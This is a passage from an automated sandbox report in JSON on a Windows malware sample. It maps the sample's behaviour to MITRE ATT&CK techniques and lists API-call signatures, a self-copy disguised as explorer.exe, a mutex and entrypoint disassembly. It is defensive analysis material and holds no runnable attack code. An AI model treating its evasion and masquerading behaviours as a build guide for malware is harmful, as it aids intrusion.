"attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "malicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Desktop Protocol", "attck_id": "T1021.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021/001", "informative_identifiers_count": 1, "parent": {"technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"CopyFileW\" to copy C:\\f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe to new location %PROGRAMFILES%\\Windows NT\\explorer.exe (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\Esmeralda_RW\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"explorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"RCXCD0E.tmp\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,and\tesp, 0xfffffff8,sub\tesp, 0x45c,push\tebx,push\tesi,push\tedi,push\t0x5dc,call\tdword ptr [0x4030d0],call\tdword ptr [0x403070],push\t0x40382c,xor\tedi, edi,push\tedi,push\tedi,movzx\tesi, ax,call\tdword ptr [0x40307c],call\tdword ptr [0x403104],cmp\teax, 0xb7,je\t0x40262c,cmp\tesi, 0x419,je\t0x40262c,cmp\tesi, 0x422,je\t0x40262c,cmp\tesi, 0x423,\"\n \"explorer.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,and\tesp, 0xfffffff8,sub\tesp, 0x45c,push\tebx,push\tesi,push\tedi,push\t0x5dc,call\tdword ptr [0x4030d0],call\tdword ptr [0x403070],push\t0x40382c,xor\tedi, edi,push\tedi,push\tedi,movzx\tesi, ax,call\tdword ptr [0x40307c],call\tdword ptr [0x403104],cmp\teax, 0xb7,je\t0x40262c,cmp\tesi, 0x419,je\t0x40262c,cmp\tesi, 0x422,je\t0x40262c,cmp\tesi, 0x423,\"\n \"RCXCD0E.tmp\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,and\tesp, 0xfffffff8,sub\tesp, 0x45c,push\tebx,push\tesi,push\tedi,push\t0x5dc,call\tdword ptr [0x4030d0],call\tdword ptr [0x403070],push\t0x40382c,xor\tedi, edi,push\tedi,push\tedi,movzx\tesi, ax,call\tdword ptr [0x40307c],call\tdword ptr [0x403104],cmp\teax, 0xb7,je\t0x40262c,cmp\tesi, 0x419,je\t0x40262c,cmp\tesi, 0x422,je\t0x40262c,cmp\tesi, 0x423,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 708d0000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"KERNEL32\" at base 770e0000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a100000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"KERNEL32.DLL\" at base 770e0000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c90000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"DWMAPI.DLL\" at base 73920000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"ADVAPI32.DLL\" at base 75400000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 76660000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"CRYPTBASE.DLL\" at base 74fc0000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"CLBCATQ.DLL\" at base 756b0000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 76390000\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"OLEAUT32.DLL\" at base 77040000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\explorer.exe (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RtlMoveMemory (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RtlComputeCrc32 (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005896)\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetProcAddress\" with a parameter GetTextExtentExPointWPri (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f46976@RPCRT4.dll\"\n \"15001600c03e1c6b@ADVAPI32.dll\"\n \"0e000f00703f1c6b@ADVAPI32.dll\"\n \"0e000f00cc3f1c6b@ADVAPI32.dll\"\n \"11001200b4471c6b@ADVAPI32.dll\"\n \"1100120048481c6b@ADVAPI32.dll\"\n \"120013008c481c6b@ADVAPI32.dll\"\n \"12001300e4481c6b@ADVAPI32.dll\"\n \"14001500386e1c6b@ADVAPI32.dll\"\n \"14001500506e1c6b@ADVAPI32.dll\"\n \"14001500686e1c6b@ADVAPI32.dll\"\n \"17001800806e1c6b@ADVAPI32.dll\"\n \"0d000e00986e1c6b@ADVAPI32.dll\"\n \"11001200a86e1c6b@ADVAPI32.dll\"\n \"11001200bc6e1c6b@ADVAPI32.dll\"\n \"0d000e0034491c6b@SHELL32.dll\"\n \"0d000e00b0491c6b@SHELL32.dll\"\n \"0f001000fc6f1c6b@ADVAPI32.dll\"\n 